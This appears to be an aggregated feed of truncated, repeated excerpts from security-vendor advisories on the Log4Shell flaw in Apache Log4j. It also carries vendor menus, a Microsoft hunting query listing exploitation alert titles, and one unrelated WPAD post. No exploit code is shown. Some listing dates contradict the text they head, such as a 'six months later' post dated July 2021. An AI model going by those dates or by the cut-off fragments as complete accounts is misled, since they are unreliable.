By: Ranga Duraisamy, Ashish Verma, Miguel Carlo Ang Dec 13, 2021 Read time: ( words)
Save to Folio
Originalartikel von Ranga Duraisamy, Ashish Verma, Nikko Tamana, Miguel Carlo Ang
In Apache Log4j, einem weit verbreiteten Logging-Paket für Java, ist eine Schwachstelle ( CVE-2021-44228 ) gefunden und mit dem Namen Log4Shell versehen worden. Sie ermöglicht es einem Angreifer, beliebigen Code auszuführen, indem er speziell bearbeitete Log-Nachrichten sendet.
Trendmicro
Patch Now: Apache Log4j Vulnerability Called Log4Shell Actively Exploited
blogs_trendmicro·2021-12-13·CVSS 10.0
CVE-2021-44228 [CRITICAL] Patch Now: Apache Log4j Vulnerability Called Log4Shell Actively Exploited
Exploits y vulnerabilidades
## Patch Now: Apache Log4j Vulnerability Called Log4Shell Actively Exploited
Log4Shell, also known as CVE-2021-44228, was first reported privately to Apache on November 24 and was patched on December 9. It affects Apache Struts, Apache Solr, Apache Druid, Elasticsearch, Apache Dubbo, and VMware vCenter.
By: Ranga Duraisamy, Ashish Verma, Miguel Carlo Ang Dec 13, 2021 Read time: ( words)
Save to Folio
Update as of Dec 28, 2021: The latest Log4j vulnerability, CVE-2021-44832, has now been addressed in the Log4j 2.17.1 release .
Update as of Dec 22, 2021: The Impact section has been updated with information on the various payloads discovered after the start of the Log4Shell attacks.
Update as of Dec. 19, 2021: Our researchers at Zero Day Initiative published
Trendmicro
Patch Now: Apache Log4j Vulnerability Called Log4Shell Actively Exploited
blogs_trendmicro·2021-12-13·CVSS 10.0
CVE-2021-44228 [CRITICAL] Patch Now: Apache Log4j Vulnerability Called Log4Shell Actively Exploited
Exploits & Vulnerabilities
## Patch Now: Apache Log4j Vulnerability Called Log4Shell Actively Exploited
Log4Shell, also known as CVE-2021-44228, was first reported privately to Apache on November 24 and was patched on December 9. It affects Apache Struts, Apache Solr, Apache Druid, Elasticsearch, Apache Dubbo, and VMware vCenter.
By: Ranga Duraisamy, Ashish Verma, Miguel Carlo Ang 2021/12/13 Read time: ( words)
Save to Folio
Update as of Dec 28, 2021: The latest Log4j vulnerability, CVE-2021-44832, has now been addressed in the Log4j 2.17.1 release .
Update as of Dec 22, 2021: The Impact section has been updated with information on the various payloads discovered after the start of the Log4Shell attacks.
Update as of Dec. 19, 2021: Our researchers at Zero Day Initiative published a
Securelist
CVE-2021-44228 vulnerability in Apache Log4j library
blogs_securelist·2021-12-13·CVSS 10.0
CVE-2021-44228 [CRITICAL] CVE-2021-44228 vulnerability in Apache Log4j library
Table of Contents
CVE-2021-44228 and CVE-2021-45046 summary
CVE-2021-44228 and CVE-2021-45046 technical details
CVE-2021-44228 exploitation statistics
Mitigations for CVE-2021-44228 and CVE-2021-45046
Affected Kaspersky products
Indicators of compromise (IOC)
Authors
AMR
Updated 2021-12-20
## CVE-2021-44228 and CVE-2021-45046 summary
A couple of weeks ago information security media reported the discovery of the critical vulnerability CVE-2021-44228 in the Apache Log4j library (CVSS severity level 10 out of 10). The threat, also named Log4Shell or LogJam , is a Remote Code Execution (RCE) class vulnerability. If an attacker manages to exploit it on a vulnerable server, they gain the ability to execute arbitrary code and potentially take full control of the system. A publicly publ
Trendmicro
Patch Now: Apache Log4j Vulnerability Called Log4Shell Actively Exploited
blogs_trendmicro·2021-12-13·CVSS 10.0
CVE-2021-44228 [CRITICAL] Patch Now: Apache Log4j Vulnerability Called Log4Shell Actively Exploited
Sfruttamento vulnerabilità
## Patch Now: Apache Log4j Vulnerability Called Log4Shell Actively Exploited
Log4Shell, also known as CVE-2021-44228, was first reported privately to Apache on November 24 and was patched on December 9. It affects Apache Struts, Apache Solr, Apache Druid, Elasticsearch, Apache Dubbo, and VMware vCenter.
By: Ranga Duraisamy, Ashish Verma, Miguel Carlo Ang Dec 13, 2021 Read time: ( words)
Save to Folio
Update as of Dec 28, 2021: The latest Log4j vulnerability, CVE-2021-44832, has now been addressed in the Log4j 2.17.1 release .
Update as of Dec 22, 2021: The Impact section has been updated with information on the various payloads discovered after the start of the Log4Shell attacks.
Update as of Dec. 19, 2021: Our researchers at Zero Day Initiative published
Dragos
Implications of Log4j Vulnerability for Operational Technology (OT) Networks
blogs_dragos·2021-12-13·CVSS 10.0
CVE-2021-44228 [CRITICAL] Implications of Log4j Vulnerability for Operational Technology (OT) Networks
Blog
# Implications of Log4j Vulnerability for Operational Technology (OT) Networks
December 13, 2021 06:18 PM7 min readAustin Scott
Table of Contents
Observed TTPs for CVE-2021-44228
Recommendations for Immediate Implementation
What’s Next?
Security researchers recently disclosed a zero-day remote code execution vulnerability, tracked as (Common Vulnerabilities and Exposures) CVE-2021-44228 in the popular Log4j2 Java logging library. Dragos Intelligence assesses with high confidence that this vulnerability will impact Operational Technology (OT) networks, based on the ubiquity of the library and the rapidly growing methodologies of exploitation.
Dragos Intelligence has observed both attempted and successful exploitation of the Log4j vulnerability in the wild and based on these obs
Securelist
CVE-2021-44228 vulnerability in Apache Log4j library
blogs_securelist·2021-12-13·CVSS 10.0
CVE-2021-44228 [CRITICAL] CVE-2021-44228 vulnerability in Apache Log4j library
Table of Contents
- CVE-2021-44228 and CVE-2021-45046 summary
- CVE-2021-44228 and CVE-2021-45046 technical details
- CVE-2021-44228 exploitation statistics
- Mitigations for CVE-2021-44228 and CVE-2021-45046
- Affected Kaspersky products
- Indicators of compromise (IOC)
Authors
- AMR
Updated 2021-12-20
## CVE-2021-44228 and CVE-2021-45046 summary
A couple of weeks ago information security media reported the discovery of the critical vulnerability CVE-2021-44228 in the Apache Log4j library (CVSS severity level 10 out of 10). The threat, also named Log4Shell or LogJam, is a Remote Code Execution (RCE) class vulnerability. If an attacker manages to exploit it on a vulnerable server, they gain the ability to execute arbitrary code and potentially take full control of the system. A publ
Trendmicro
Patch Now: Apache Log4j Vulnerability Called Log4Shell Actively Exploited
blogs_trendmicro·2021-12-13·CVSS 10.0
CVE-2021-44228 [CRITICAL] Patch Now: Apache Log4j Vulnerability Called Log4Shell Actively Exploited
Exploits & Vulnerabilities
## Patch Now: Apache Log4j Vulnerability Called Log4Shell Actively Exploited
Log4Shell, also known as CVE-2021-44228, was first reported privately to Apache on November 24 and was patched on December 9. It affects Apache Struts, Apache Solr, Apache Druid, Elasticsearch, Apache Dubbo, and VMware vCenter.
By: Ranga Duraisamy, Ashish Verma, Miguel Carlo Ang Dec 13, 2021 Read time: ( words)
Save to Folio
Update as of Dec 28, 2021: The latest Log4j vulnerability, CVE-2021-44832, has now been addressed in the Log4j 2.17.1 release .
Update as of Dec 22, 2021: The Impact section has been updated with information on the various payloads discovered after the start of the Log4Shell attacks.
Update as of Dec. 19, 2021: Our researchers at Zero Day Initiative published
Tenable
Apache Log4j Flaw: A Fukushima Moment for the Cybersecurity Industry
blogs_tenable·2021-12-13
Apache Log4j Flaw: A Fukushima Moment for the Cybersecurity Industry
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Trendmicro
Patch Now: Apache Log4j Vulnerability Called Log4Shell Actively Exploited
blogs_trendmicro·2021-12-13·CVSS 10.0
CVE-2021-44228 [CRITICAL] Patch Now: Apache Log4j Vulnerability Called Log4Shell Actively Exploited
Exploits & Vulnerabilities
# Patch Now: Apache Log4j Vulnerability Called Log4Shell Actively Exploited
Log4Shell, also known as CVE-2021-44228, was first reported privately to Apache on November 24 and was patched on December 9. It affects Apache Struts, Apache Solr, Apache Druid, Elasticsearch, Apache Dubbo, and VMware vCenter.
By: Ranga Duraisamy, Ashish Verma, Miguel Carlo Ang
2021/12/13
Read time: ( words)
Save to Folio
Update as of Dec 28, 2021: The latest Log4j vulnerability, CVE-2021-44832, has now been addressed in the Log4j 2.17.1 release.
Update as of Dec 22, 2021: The Impact section has been updated with information on the various payloads discovered after the start of the Log4Shell attacks.
Update as of Dec. 19, 2021: Our researchers at Zero Day Initiative published a g
Dragos
Implications of Log4j Vulnerability for Operational Technology (OT) Networks
blogs_dragos·2021-12-13
Implications of Log4j Vulnerability for Operational Technology (OT) Networks
OT Cybersecurity Basics Build a stronger OT security strategy
5 Critical Controls SANS ICS framework for defense
Industrial Risk Management Quantifying OT risk and dependencies
Monitoring Threat Groups Know your adversary
Year in Review Report 9th annual threat report
OT Compliance NIS2, CAF v4, SOCI/SONS, TSA, & more
NERC CIP Dragos Alignment
INSM Compliance Path for NERC-CIP-015
RESOURCES
Threat Reports
Whitepapers
Datasheets
Solution Briefs
Case Studies
Blog
Webinars
Dragos Industrial Security Conference
COMMUNITY
OT-CERT Program
Community Defense Program
DRAGOS ACADEMY
On-Demand Training
About Dragos We make defense doable
Leadership Experts in defense
Newsroom Up-to-date cyber news
Careers Current job openings
Event Calendar Connect in person
Dragos Industri
Sentinelone
SentinelOne vs Apache Log4j2 (CVE-2021-44228) - Windows
blogs_sentinelone·2021-12-12·CVSS 10.0
[CRITICAL] SentinelOne vs Apache Log4j2 (CVE-2021-44228) - Windows
How It Works The Singularity XDR Difference
Singularity Marketplace One-Click Integrations to Unlock the Power of XDR
Pricing & Packaging Comparisons and Guidance at a Glance
Purple AI Accelerate SecOps with Generative AI
Singularity Hyperautomation Easily Automate Security Processes
AI-SIEM The AI SIEM for the Autonomous SOC
Singularity Data Lake AI-Powered, Unified Data Lake
Singularity Data Lake for Log Analytics Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
Singularity Endpoint Autonomous Prevention, Detection, and Response
Singularity XDR Native & Open Protection, Detection, and Response
Singularity RemoteOps Forensics Orchestrate Forensics at Scale
Singularity
Threat Intelligence Comprehensive Adversary Intelligence
Singularity Vulnerability Management
Tenable
Apache Log4j Flaw Puts Third-Party Software in the Spotlight
blogs_tenable·2021-12-12
Apache Log4j Flaw Puts Third-Party Software in the Spotlight
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Management (CSPM)
Compliance
Cyber insurance
Data Security Posture Management (DSPM)
Google Cloud security
Infrastructure as Code (IaC) security
Kubernetes Security Pos
Sentinelone
SentinelOne vs Apache Log4j2 (CVE-2021-44228) - Linux - Detection, Prevention & Mitigation
blogs_sentinelone·2021-12-12·CVSS 10.0
[CRITICAL] SentinelOne vs Apache Log4j2 (CVE-2021-44228) - Linux - Detection, Prevention & Mitigation
How It Works The Singularity XDR Difference
Singularity Marketplace One-Click Integrations to Unlock the Power of XDR
Pricing & Packaging Comparisons and Guidance at a Glance
Purple AI Accelerate SecOps with Generative AI
Singularity Hyperautomation Easily Automate Security Processes
AI-SIEM The AI SIEM for the Autonomous SOC
Singularity Data Lake AI-Powered, Unified Data Lake
Singularity Data Lake for Log Analytics Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
Singularity Endpoint Autonomous Prevention, Detection, and Response
Singularity XDR Native & Open Protection, Detection, and Response
Singularity RemoteOps Forensics Orchestrate Forensics at Scale
Singularity
Threat Intelligence Comprehensive Adversary Intelligence
Singularity Vulnerability Management
Microsoft
Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability
blogs_microsoft·2021-12-12·CVSS 10.0
CVE-2021-44228 [CRITICAL] Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability
Research
December 11, 2021
Devices with Log4j vulnerability alerts and additional other alert-related context
This query surfaces devices with Log4j-related alerts and adds additional context from other alerts on the device.
// Get any devices with Log4J related Alert Activity
let DevicesLog4JAlerts = AlertInfo
| where Title in~('Suspicious script launched',
'Exploitation attempt against Log4j (CVE-2021-44228)',
'Suspicious process executed by a network service',
'Possible target of Log4j exploitation (CVE-2021-44228)',
'Possible target of Log4j exploitation',
'Possible Log4j exploitation',
'Network connection seen in CVE-2021-44228 exploitation',
'Log4j exploitation detected',
'Possible exploitation of CVE-2021-44228',
'Possible target of Log4j vulnerability (CVE-2021-44228) scanning'
Fortinet
Apache Log4j Vulnerability | Fortinet Blog
blogs_fortinet·2021-12-12
Apache Log4j Vulnerability | Fortinet Blog
PSIRT BLOGS
Apache Log4j Vulnerability
By Carl Windsor | December 12, 2021
Apache Log4j Vulnerability Defined
Apache Log4j is a Java-based logging audit framework and Apache Log4j2 1.14.1 and below are susceptible to a remote code execution vulnerability where an attacker can leverage this vulnerability to take full control of a machine.
This module is a prerequisite for other software which means it can be found in many products and is trivial to exploit. It is critical that organizations take immediate action to inventory their systems and prioritize remediation.
Impacted Versions
Apache Log4j 2.x <= 2.15.0-rc1
CVSS: 10 (CRITICAL)
Apache Log4j Vulnerability Overview
Until a few days ago, most people would not have had any knowledge of the Log4j2 software. However, this little-know
Sentinelone
SentinelOne vs Apache Log4j2 (CVE-2021-44228) - Linux - Detection, Prevention & Mitigation
blogs_sentinelone·2021-12-12·CVSS 10.0
CVE-2021-44228 [CRITICAL] SentinelOne vs Apache Log4j2 (CVE-2021-44228) - Linux - Detection, Prevention & Mitigation
Platform
- Platform Overview
- Singularity Platform
Welcome to IntegratedEnterprise Security
- AI Security Portfolio
Leading the Way in AI-Powered Security Solutions
- How It Works
The Singularity XDR Difference
- Singularity Marketplace
One-Click Integrations to Unlock the Power of XDR
- Pricing & Packaging
Comparisons and Guidance at a Glance
- Data & AI
- Purple AI
Accelerate SecOps with Generative AI
- Singularity Hyperautomation
Easily Automate Security Processes
- AI-SIEM
The AI SIEM for the Autonomous SOC
- Singularity Data Lake
AI-Powered, Unified Data Lake
- Singularity Data Lake for Log Analytics
Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
- Endpoint Security
- Singularity Endpoint
Autonomous Prevention, Detection, and Response
- Singularity XDR
Native &
Zscaler
CVE-2021-44228: Log4j2 0-day Vulnerability
blogs_zscaler·2021-12-11·CVSS 10.0
[CRITICAL] CVE-2021-44228: Log4j2 0-day Vulnerability
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Sentinelone
CVE-2021-44228: Apache Log4j Vulnerability
blogs_sentinelone·2021-12-11·CVSS 10.0
CVE-2021-44228 [CRITICAL] CVE-2021-44228: Apache Log4j Vulnerability
## Executive Summary
- A new critical remote code execution vulnerability in Apache Log4j2, a Java-based logging tool, is being tracked as CVE-2021-44228.
- Further vulnerabilities in the Log4j library, including CVE-2021-44832 and CVE-2021-45046, have since come to light, as detailed here.
- Major services and applications globally are impacted by these vulnerabilities due to the prevalence of Log4j2’s use in many web apps.
- Exploit proof-of-concept code is widely available and internet-wide scanning suggests active exploitation.
- Exploit attempts have led to commodity cryptominer, ransomware and other payloads. SentinelOne expects further opportunistic abuse by a wide variety of attackers, including further ransomware and nation-state actors.
- Due to the ease and rate of exploitation
Zscaler
Zero Trust Architecture prevents Apache Log4j Vulnerability
blogs_zscaler·2021-12-11·CVSS 10.0
[CRITICAL] Zero Trust Architecture prevents Apache Log4j Vulnerability
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Sentinelone
CVE-2021-44228: Apache Log4j Vulnerability
blogs_sentinelone·2021-12-11·CVSS 10.0
CVE-2021-44228 [CRITICAL] CVE-2021-44228: Apache Log4j Vulnerability
## Executive Summary
A new critical remote code execution vulnerability in Apache Log4j2 , a Java-based logging tool, is being tracked as CVE-2021-44228.
Further vulnerabilities in the Log4j library, including CVE-2021-44832 and CVE-2021-45046, have since come to light, as detailed here .
Major services and applications globally are impacted by these vulnerabilities due to the prevalence of Log4j2’s use in many web apps.
Exploit proof-of-concept code is widely available and internet-wide scanning suggests active exploitation.
Exploit attempts have led to commodity cryptominer, ransomware and other payloads. SentinelOne expects further opportunistic abuse by a wide variety of attackers, including further ransomware and nation-state actors.
Due to the ease and rate of exploitation atte
Huntress
Critical RCE Vulnerability: log4j - CVE-2021-44228 | Huntress
blogs_huntress·2021-12-10·CVSS 10.0
CVE-2021-44228 [CRITICAL] Critical RCE Vulnerability: log4j - CVE-2021-44228 | Huntress
Our team is investigating CVE-2021-44228, a critical vulnerability that’s affecting a Java logging package log4j which is used in a significant amount of software, including Apache, Apple iCloud, Steam, Minecraft and others. Huntress is actively uncovering the effects of this vulnerability and will be frequently updating this page.
At this point, we have not identified an impact to The Huntress Security Platform, but our teams are diligently checking to ensure all instances of our back-end are safe and will be taking appropriate action as needed.
If your organization uses the log4j library, you should upgrade to log4j 2.17.1 immediately. Be sure that your Java instance is up-to-date; however, it’s worth noting that this isn’t an across-the-board solution. You may need to wait until your
Talos
Threat Advisory: Critical Apache Log4j vulnerability being exploited in the wild
blogs_talos·2021-12-10·CVSS 10.0
[CRITICAL] Threat Advisory: Critical Apache Log4j vulnerability being exploited in the wild
## Update History
DateDescription of UpdatesDec. 20, 2021
Additional coverage and IOCs; additional detection capabilities for customers via Cisco Global Threat Alerts.
Dec. 18, 2021
Additional mitigation guidance; updated coverage information.
Dec. 17, 2021
Added additional vulnerability and mitigation information; added section on guidance for developers; timeline.
Dec. 16, 2021
Added additional vulnerability and mitigation information; added event timeline; relevant advisory information.
Dec. 15, 2021
Added observations on exploitation activity; updated coverage information. Additional IOCs.
Dec. 14, 2021
Added new CVE details; updated coverage information; additional mitigation guidance; additional threat vectors; Additional IOCs.
Dec. 13, 2021
Added additional vulnerability informatio
Tenable
CVE-2021-44228: Proof-of-Concept for Critical Apache Log4j Remote Code Execution Vulnerability Available (Log4Shell)
blogs_tenable·2021-12-10·CVSS 10.0
[CRITICAL] CVE-2021-44228: Proof-of-Concept for Critical Apache Log4j Remote Code Execution Vulnerability Available (Log4Shell)
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Management (CSPM)
Compliance
Cyber insurance
Data Security Posture Management (DSPM)
Google Cloud security
Infrastructure as Code (IaC) security
Kubernetes Security Pos
Talos
Threat Advisory: Critical Apache Log4j vulnerability being exploited in the wild
blogs_talos·2021-12-10·CVSS 10.0
[CRITICAL] Threat Advisory: Critical Apache Log4j vulnerability being exploited in the wild
## Threat Advisory: Critical Apache Log4j vulnerability being exploited in the wild
## Update History
Dec. 20, 2021
Additional coverage and IOCs; additional detection capabilities for customers via Cisco Global Threat Alerts.
Dec. 18, 2021
Additional mitigation guidance; updated coverage information.
Dec. 17, 2021
Added additional vulnerability and mitigation information; added section on guidance for developers; timeline.
Dec. 16, 2021
Added additional vulnerability and mitigation information; added event timeline; relevant advisory information.
Dec. 15, 2021
Added observations on exploitation activity; updated coverage information. Additional IOCs.
Dec. 14, 2021
Added new CVE details; updated coverage information; additional mitigation guidance; additional threat vectors; Ad
Talos
Threat Source Newsletter (Dec. 16, 2021)
blogs_talos·2021-12-10
Threat Source Newsletter (Dec. 16, 2021)
## Threat Source Newsletter (Dec. 16, 2021)
Good afternoon, Talos readers.
I'm just going to cut to the chase since I know all anyone wants to read about is Log4J. For the latest Talos research, continually check back on our blog post here . Above is the live stream we recorded Monday morning updating everyone on the situation, but of course, a lot has already changed since then. Which is why Beers with Talos will be returning for a live recording Friday at noon ET . You can join us on any of our social media platforms or over on our YouTube page .
This will be the last Threat Source newsletter of 2021 as we head into the holiday break. We hope everyone is able to put Log4J behind them at least for a few days and enjoy some quality time with friends and family.
## Cybersecurity week in
Unit42
Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021-44228) (Updated)
blogs_unit42·2021-12-10·CVSS 10.0
CVE-2021-44228 [CRITICAL] Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021-44228) (Updated)
## Executive Summary
On Dec. 9, 2021, a remote code execution (RCE) vulnerability in Apache Log4j 2 was identified being exploited in the wild. Public proof of concept (PoC) code was released and subsequent investigation revealed that exploitation was incredibly easy to perform. By submitting a specially crafted request to a vulnerable system, depending on how the system is configured, an attacker is able to instruct that system to download and subsequently execute a malicious payload. Due to the discovery of this exploit being so recent, there are still many servers, both on-premises and within cloud environments, that have yet to be patched. Like many high severity RCE exploits, thus far, massive scanning activity for CVE-2021-44228 has begun on the internet with the intent of seeking o
Huntress
Critical RCE Vulnerability Updates (log4j - CVE-2021-44228) | Huntress
blogs_huntress·2021-12-10·CVSS 10.0
CVE-2021-44228 [CRITICAL] Critical RCE Vulnerability Updates (log4j - CVE-2021-44228) | Huntress
Our team is investigating CVE-2021-44228, a critical vulnerability that’s affecting a Java logging package log4j which is used in a significant amount of software, including Apache, Apple iCloud, Steam, Minecraft and others. Huntress is actively uncovering the effects of this vulnerability and will be frequently updating this page.
At this point, we have not identified an impact to The Huntress Security Platform, but our teams are diligently checking to ensure all instances of our back-end are safe and will be taking appropriate action as needed.
If your organization uses the log4j library, you should upgrade to log4j 2.17.1 immediately. Be sure that your Java instance is up-to-date; however, it’s worth noting that this isn’t an across-the-board solution. You may need to wait until your
Unit42
Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021-44228) (Updated)
blogs_unit42·2021-12-10·CVSS 9.8
CVE-2021-44228 [CRITICAL] Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021-44228) (Updated)
Threat Research Center
Threat Research
Vulnerabilities
## Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021-44228) (Updated)
Tao Yan
Qi Deng
Haozhe Zhang
Yu Fu
Josh Grunzweig
Mike Harbison
Robert Falcone
Published: December 10, 2021
Threat Research
Vulnerabilities
Apache Log4j
CVE-2017-5645
CVE-2019-17571
CVE-2021-44228
CVE-2021-44832
CVE-2021-45046
CVE-2021-45105
Denial of service
Exploit
Log4j
Log4j 2
RCE
## Executive Summary
On Dec. 9, 2021, a remote code execution (RCE) vulnerability in Apache Log4j 2 was identified being exploited in the wild. Public proof of concept (PoC) code was released and subsequent investigation revealed that exploitation was incredibly easy to perform. By submitting a specially crafted request to a vu
Talos
Threat Source Newsletter (Dec. 16, 2021)
blogs_talos·2021-12-10
Threat Source Newsletter (Dec. 16, 2021)
Good afternoon, Talos readers.
I'm just going to cut to the chase since I know all anyone wants to read about is Log4J. For the latest Talos research, continually check back on our blog post here. Above is the live stream we recorded Monday morning updating everyone on the situation, but of course, a lot has already changed since then. Which is why Beers with Talos will be returning for a live recording Friday at noon ET. You can join us on any of our social media platforms or over on our YouTube page.
This will be the last Threat Source newsletter of 2021 as we head into the holiday break. We hope everyone is able to put Log4J behind them at least for a few days and enjoy some quality time with friends and family.
## Cybersecurity week in review
- The Log4j vulnerability made national
Tenable
log4shell Critical Vulnerability
blogs_tenable·2021-12-10·CVSS 10.0
CVE-2021-44228 [CRITICAL] log4shell Critical Vulnerability
by Cesar Navas December 10, 2021
On December 9, researchers published proof-of-concept (PoC) exploit code for a critical vulnerability in Apache Log4j , a Java logging library used by a number of applications and services. This vulnerability, identified as CVE-2021-44228, is a remote code execution (RCE) vulnerability in Apache Log4j. This vulnerability impacts a number of services and applications used widely across the internet, and is actively being exploited with multiple proofs of concept now appearing on GitHub.
According to the published CVE, all Apache Log4j versions 2.14.1 or less are vulnerable. An unauthenticated remote attacker could exploit this flaw by sending a specially crafted request to a server running a vulnerable version of Log4j. The crafted request uses a Java Nami
Sentinelone
In-the-Wild WPAD Attack | How Threat Actors Abused Flawed Protocol For Years
blogs_sentinelone·2021-12-09
In-the-Wild WPAD Attack | How Threat Actors Abused Flawed Protocol For Years
A Guest Post By Daniel Persch, QGroup GmbH, Frankfurt am Main
The possibility of leveraging the Web Proxy Auto-Discovery (WPAD) protocol to conduct MITM (Man-in-the-Middle) attacks has been known for many years and has been described previously . However, until now, there was no known case of it occurring in-the-wild. In this post, we disclose details of such an ITW attack discovered by our incident response specialists at QGroup GmbH , Germany, who successfully investigated and mitigated the attack with the help of the SentinelOne platform .
## What is WPAD?
Web Proxy Auto Discovery is a protocol used to ensure all devices on a network use the same web proxy configuration. Rather than having to manually configure each device, network administrators may use WPAD to ease the process. Whe
Wiz
Log4Shell Meltdown: How to protect your cloud from this critical RCE threat | Wiz Blog
blogs_wiz·2021-12-09·CVSS 10.0
[CRITICAL] Log4Shell Meltdown: How to protect your cloud from this critical RCE threat | Wiz Blog
## ** Updated 12/21 **
Security teams worldwide are racing to contain the fallout from a critical vulnerability in the widely-used, open source logging library Log4j. The vulnerability, called Log4Shell, affects a huge number of ubiquitous apps, websites, and services, and as we get further into remediation, we've seen mixed results on the progress so far .
In this post, we’ll provide a quick overview of Log4Shell: what it is, its impact, and recommendations for security teams. You can see the full technical breakdown here . For non-Wiz customers, get a rapid assessment of Log4Shell in your environment. For Wiz customers, Wiz detects Log4Shell across all clouds and workloads in your environment and provides remediation guidance. You can get an immediate overview of your risk posture by l
Wiz
Log4Shell Meltdown: How to protect your cloud from this critical RCE threat | Wiz Blog
blogs_wiz·2021-12-09·CVSS 10.0
[CRITICAL] Log4Shell Meltdown: How to protect your cloud from this critical RCE threat | Wiz Blog
### ** Updated 12/21 **
Security teams worldwide are racing to contain the fallout from a critical vulnerability in the widely-used, open source logging library Log4j. The vulnerability, called Log4Shell, affects a huge number of ubiquitous apps, websites, and services, and as we get further into remediation, we've seen mixed results on the progress so far.
In this post, we’ll provide a quick overview of Log4Shell: what it is, its impact, and recommendations for security teams. You can see the full technical breakdown here. For non-Wiz customers, get a rapid assessment of Log4Shell in your environment. For Wiz customers, Wiz detects Log4Shell across all clouds and workloads in your environment and provides remediation guidance. You can get an immediate overview of your risk posture by lo
Sentinelone
Log4j Zero-Day RCE (CVE-2021-44228) Vulnerability: Proof of Concept and Remediation Guidance
blogs_sentinelone·2021-09-13·CVSS 10.0
CVE-2021-44228 [CRITICAL] Log4j Zero-Day RCE (CVE-2021-44228) Vulnerability: Proof of Concept and Remediation Guidance
On the 9th of December, 2021, a new vulnerability, CVE-2021-44228, was discovered in Log4j, a popular open-source Java logging framework distributed under Apache Software License. The vulnerability is remotely exploitable without authentication, i.e., it may be exploited over a network without a username and password.
## About the RCE vulnerability
Java logging framework Log4j is used to generate logs and record the activity inside an application. The vulnerability can be exploited to allow unauthorized remote code execution on the affected servers. Hackers are still utilizing the recently discovered exploit to attack the servers. The exploit lets an attacker execute malicious Java code on the vulnerable server.
- The attacker will invoke any server endpoint with a malicious payload.
-
Sentinelone
Log4j Zero-Day RCE (CVE-2021-44228) Vulnerability: Proof of Concept and Remediation Guidance
blogs_sentinelone·2021-09-13·CVSS 10.0
CVE-2021-44228 [CRITICAL] Log4j Zero-Day RCE (CVE-2021-44228) Vulnerability: Proof of Concept and Remediation Guidance
On the 9th of December, 2021, a new vulnerability, CVE-2021-44228, was discovered in Log4j, a popular open-source Java logging framework distributed under Apache Software License. The vulnerability is remotely exploitable without authentication, i.e., it may be exploited over a network without a username and password.
## About the RCE vulnerability
Java logging framework Log4j is used to generate logs and record the activity inside an application. The vulnerability can be exploited to allow unauthorized remote code execution on the affected servers. Hackers are still utilizing the recently discovered exploit to attack the servers. The exploit lets an attacker execute malicious Java code on the vulnerable server.
The attacker will invoke any server endpoint with a malicious payload.
The
Dragos
Six Months Later: Assessing the OT and ICS Risks of the Log4j Vulnerability
blogs_dragos·2021-07-21·CVSS 10.0
[CRITICAL] Six Months Later: Assessing the OT and ICS Risks of the Log4j Vulnerability
Blog
# Six Months Later: Assessing the OT and ICS Risks of the Log4j Vulnerability
July 21, 2021 05:35 PM5 min readDragos, Inc.
Table of Contents
Since the December 2021 Headlines, How Has the Log4j Threat Changed?
Will Log4j Be a Persistent Vulnerability in OT and ICS Environments for Years?
Researchers in Search of the Log4j Vulnerability in the Wild
Nation State-Sponsored Adversaries Targeting Log4j: Stonefly, APT35, APT41
